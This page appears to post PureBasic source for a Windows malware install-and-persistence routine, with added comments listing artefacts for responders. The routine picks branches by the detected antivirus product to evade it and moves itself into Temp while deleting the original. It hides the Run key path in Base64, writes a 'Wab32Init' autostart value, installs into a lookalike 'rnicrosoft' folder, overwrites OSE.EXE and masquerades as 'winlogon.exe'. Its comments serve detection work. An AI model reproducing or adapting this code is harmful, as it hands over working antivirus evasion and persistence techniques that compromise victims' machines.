2013年6月18日 星期二

Procedure checkinstall(av.s,os.s,is64.s)



; checkinstall - installation and persistence routine of the sample shown on this page.
;
; Parameters:
;   av   - tag naming the security product the caller believes is installed
;          ("Rs|", "Kaspersky|", "Avast|", "Norton|", "360|", ...). It selects the
;          code path; how the tag is produced is not visible in this listing.
;   os   - OS tag. "Vista|", "Win7|", "2008|" and "Win8|" take the per-user path,
;          any other value takes the machine-wide path.
;   is64 - not read by any active line (only mentioned in a trailing comment).
;
; No return value. Most paths end the process with End after relaunching a copy.
; #exename and WinCallback() are defined outside this listing.
;
; Artefacts a responder can look for, all taken from the lines below:
;   - a directory named "rnicrosoft" (r+n imitating "m") under Common Files, or under
;     the same path inside %USERPROFILE%\AppData\Local\VirtualStore
;   - a Run value named "Wab32Init" under HKCU or HKLM whose data is a quoted path
;     into that directory
;   - a file named "desktop" built from the Temp variable, holding the original image path
;   - WinRAR32.exe next to WinRAR.exe, and a replaced
;     "Common Files\Microsoft Shared\Source Engine\OSE.EXE"
;   - a zero-sized window whose title is "winlogon.exe"
Procedure checkinstall(av.s,os.s,is64.s)
  ; kav_boot is never set to 1 by an active line (the only assignment is commented out below).
  kav_boot.l=0
  tpath.s=GetEnvironmentVariable("Temp")
  path.s=""
  ; Install directory. On Vista and later the per-user VirtualStore mirror of
  ; Program Files\Common Files is used; this location is writable without elevation.
  If os = "Win7|" Or os = "Vista|" Or os = "2008|" Or os="Win8|" ;And is64="32"
    path=GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\Common Files\rnicrosoft\"
  Else
    path=GetEnvironmentVariable("CommonProgramFiles")+"\rnicrosoft\"
  EndIf
 
  
  path2.s=""
  hk.l
  ; Stage 1: relocate the running image into the Temp directory and restart from there.
  If av="Rs|"
    ; "Rs|" path: record the current image path in a marker file, copy the image,
    ; start the copy and exit. No "\" is inserted between tpath and the file names
    ; here, so the resulting paths depend on whether the Temp value ends in a backslash.
    If ProgramFilename()<>tpath+#exename
      fh.l=CreateFile(#PB_Any,tpath+"desktop")
      WriteString(fh,ProgramFilename())
      CloseFile(fh)
      CopyFile(ProgramFilename(),tpath+#exename)
      RunProgram(tpath+#exename)
      End
    EndIf  
  Else 
    If ProgramFilename()<>tpath+"\"+#exename 
      ; Kaspersky branch: every statement is commented out, so nothing runs here.
      If av="Kaspersky|" And ProgramFilename()="C:\Program Files\WinRAR\WinRAR.exe"       
;         kav_boot=1 
;         SHGetSpecialFolderPath_(0, @path2, #CSIDL_COMMON_STARTUP, 0)
;         DeleteFile(path2+"\"+Space(128)+".rar")     

      ElseIf av="Avast|"
         ; Avast branch: the move is commented out, the image stays where it is.
         ;MoveFileEx_(ProgramFilename(),path+"\"+#exename,3)
      Else
        ; Flags 3 = MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED: the image is
        ; moved (not copied) into Temp, so the original file disappears from disk.
        MoveFileEx_(ProgramFilename(),tpath+"\"+#exename,3) 
        RunProgram(tpath+"\"+#exename)
        End       
      EndIf
    EndIf
  EndIf
 
  ; Second run on the "Rs|" path: read the marker file written above and delete
  ; the file it names (the original image). The marker file itself is left behind.
  If av="Rs|"
    fh=ReadFile(#PB_Any,tpath+"desktop")
    DeleteFile(ReadString(fh))   
    CloseFile(fh)
    ;DeleteFile(tpath+"desktop")
  EndIf
 
 
 
 
  ; String hiding for the registry path. The Base64 text is split in two and the
  ; missing middle is supplied by the loop counter; every iteration overwrites
  ; test, so only the last one (i=25) determines the value used below. The
  ; author's own comment on the next lines gives the intent and the decoded value.
  ;bypass nod,avg
  ;SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  test.s=""
  test1.s="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb"
  test2.s = "cUnVu"
  test3.s=""
  dec.s = Space(1024) 
  ii.l=-100
  For i = ii To 25
    test3=test1+Str(i)+test2
    Base64Decoder(@test3, StringByteLength(test3), @dec, 1024)
    test = dec
  Next

  ; Data for the Run value: the install path in double quotes (Chr(34)).
  buf.s=Chr(34)+path+#exename+Chr(34)
  ; Hive selection: per-user on Vista and later, machine-wide otherwise.
  If os="Vista|" Or os="Win7|" Or  os = "2008|" Or os="Win8|"
    key=#HKEY_CURRENT_USER
  Else
    key=#HKEY_LOCAL_MACHINE
  EndIf 
  ; Stage 2: autostart entry. The value name is always "Wab32Init"; the branches
  ; differ only in how the write is issued.
  If RegOpenKey_(key,test,@hk)=0   
    ;replace RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))     
    ; Advapi32.dll is opened so the write function can be resolved by name at
    ; run time instead of being called through the import, per the comment above.
    result.l=OpenLibrary(#PB_Any,"Advapi32.dll")
    point.l=0
   
    ;If av="AVG|"
      ;point=GetFunction(result,http_get("header3.php")) 
    ;Else
    If  av="Norton|"
     
      ; Opens a 0x0 window titled "winlogon.exe" before writing. The flag value
      ; 268435456 is $10000000 - presumably #PB_Window_Invisible, confirm against
      ; the PureBasic constants. This branch calls RegSetValueEx_ directly.
      If OpenWindow(0, 0, 0, 0, 0, "winlogon.exe", 268435456)
              
        hk.l
        buf.s=Chr(34)+path+#exename+Chr(34)
       
        RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))              
        RegCloseKey_(hk)
       
      EndIf
    ElseIf av="Kaspersky|" Or av="360|"
      ; All statements are commented out: no Run value is written on this path
      ; and the opened key handle is not closed here.
;       If kav_boot=1
;         point=GetFunction(result,"RegSetValueExA")
;         CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf,Len(buf))
;       EndIf 
;       RegCloseKey_(hk)
     
    ElseIf av="360|-"
      ; Matches only the distinct tag "360|-" ("360|" is taken by the branch above).
      ; The value data is padded with 1,000,000 spaces; the reason is not stated in
      ; the source. An unusually large Run value is itself a useful hunting signal.
      point=GetFunction(result,"RegSetValueExA")
      buf2.s=buf+Space(1000000)
      CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf2,Len(buf2))  
      ;CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf,Len(buf))   
      ;RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))
      RegCloseKey_(hk)
     
    Else
      ; Default write: RegSetValueExA resolved by name and called through the pointer.
      point=GetFunction(result,"RegSetValueExA")       
      CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf,Len(buf))   
      ;RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))
      RegCloseKey_(hk)
     
     
    EndIf
   
   
   
   
  EndIf
 
  ; Stage 3: place the final copy on disk and start it, again per product tag.
  Select av
    Case "Kaspersky|"
      ; Entire case is commented out; execution falls through to EndProcedure.
;       If kav_boot=1
;         CreateDirectory(path)
;         CopyFile(ProgramFilename(),path+#exename)
;         RunProgram(path+#exename,"rar_back",GetEnvironmentVariable("Temp"))       
;         End
;       Else
;         CopyFile("C:\Program Files\WinRAR\WinRAR.exe","C:\Program Files\WinRAR\WinRAR32.exe")        
;         SHGetSpecialFolderPath_(0, @path, #CSIDL_COMMON_STARTUP, 0)
;         MoveFileEx_(ProgramFilename(),path+"\"+Space(128)+".rar", 4)
;         If OpenWindow(0, 0, 0, 0, 0, "winlogon.exe", 268435456)
;           SetWindowCallback(@WinCallback())
;           SetProcessShutdownParameters_( 0, 0)
;           Repeat
;             Select WaitWindowEvent()
;               Case #PB_Event_CloseWindow
;                 End
;             EndSelect
;           ForEver
;         EndIf       
;         End
;       EndIf
    ;Case av="Avast|"
     
    Case "360|"
      ; kav_boot is still 0 at this point, so only the Else arm can run in the
      ; code as published.
      If kav_boot=1
        CreateDirectory(path)
        CopyFile(ProgramFilename(),path+#exename)       
        RunProgram(path+#exename,"rar_back",GetEnvironmentVariable("Temp"))       
        End
      Else
        ; Copies WinRAR.exe to WinRAR32.exe, overwrites path with the common
        ; Startup folder (not used again by an active line), and copies the image
        ; over OSE.EXE - presumably the Office Source Engine binary, which would be
        ; run by its service; confirm on the affected host. Hard-coded
        ; C:\Program Files paths are used throughout.
        CopyFile("C:\Program Files\WinRAR\WinRAR.exe","C:\Program Files\WinRAR\WinRAR32.exe")        
        SHGetSpecialFolderPath_(0, @path, #CSIDL_COMMON_STARTUP, 0) 
        CopyFile(ProgramFilename(),"C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE")
        ;MoveFileEx_(ProgramFilename(),path+"\"+Space(128)+".rar", 3)
        ; The process then stays resident behind a window titled "winlogon.exe",
        ; handing messages to WinCallback() (defined elsewhere) until the window closes.
        If OpenWindow(0, 0, 0, 0, 0, "winlogon.exe", 268435456)
          SetWindowCallback(@WinCallback())
          ;SetProcessShutdownParameters_( 0, 0)
          Repeat
            Select WaitWindowEvent()
              Case #PB_Event_CloseWindow
                End
            EndSelect
          ForEver
        EndIf       
        End
      EndIf
     
     
     
    Default 
      ; Every other tag: create the "rnicrosoft" install directory one level at a
      ; time (CreateDirectory makes a single level per call).
      If os = "Win7|" Or os = "Vista|" Or os = "2008|" Or os="Win8|"
        CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\")
        CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\")
        CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\Common Files\")
        CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\Common Files\rnicrosoft\")
      Else
        CreateDirectory(GetEnvironmentVariable("CommonProgramFiles")+"\rnicrosoft\")
       
      EndIf
     
      ; Non-Avast: copy the image to the install path and start it immediately.
      ; Avast: only move the image there (flags 3, as above) and leave the start
      ; to the Run value written earlier.
      If av <> "Avast|"
        CopyFile(ProgramFilename(),path+#exename)
        RunProgram(path+#exename) 
      Else
        MoveFileEx_(ProgramFilename(),path+#exename,3)
      EndIf
      End
     
  EndSelect
   
   
 
EndProcedure
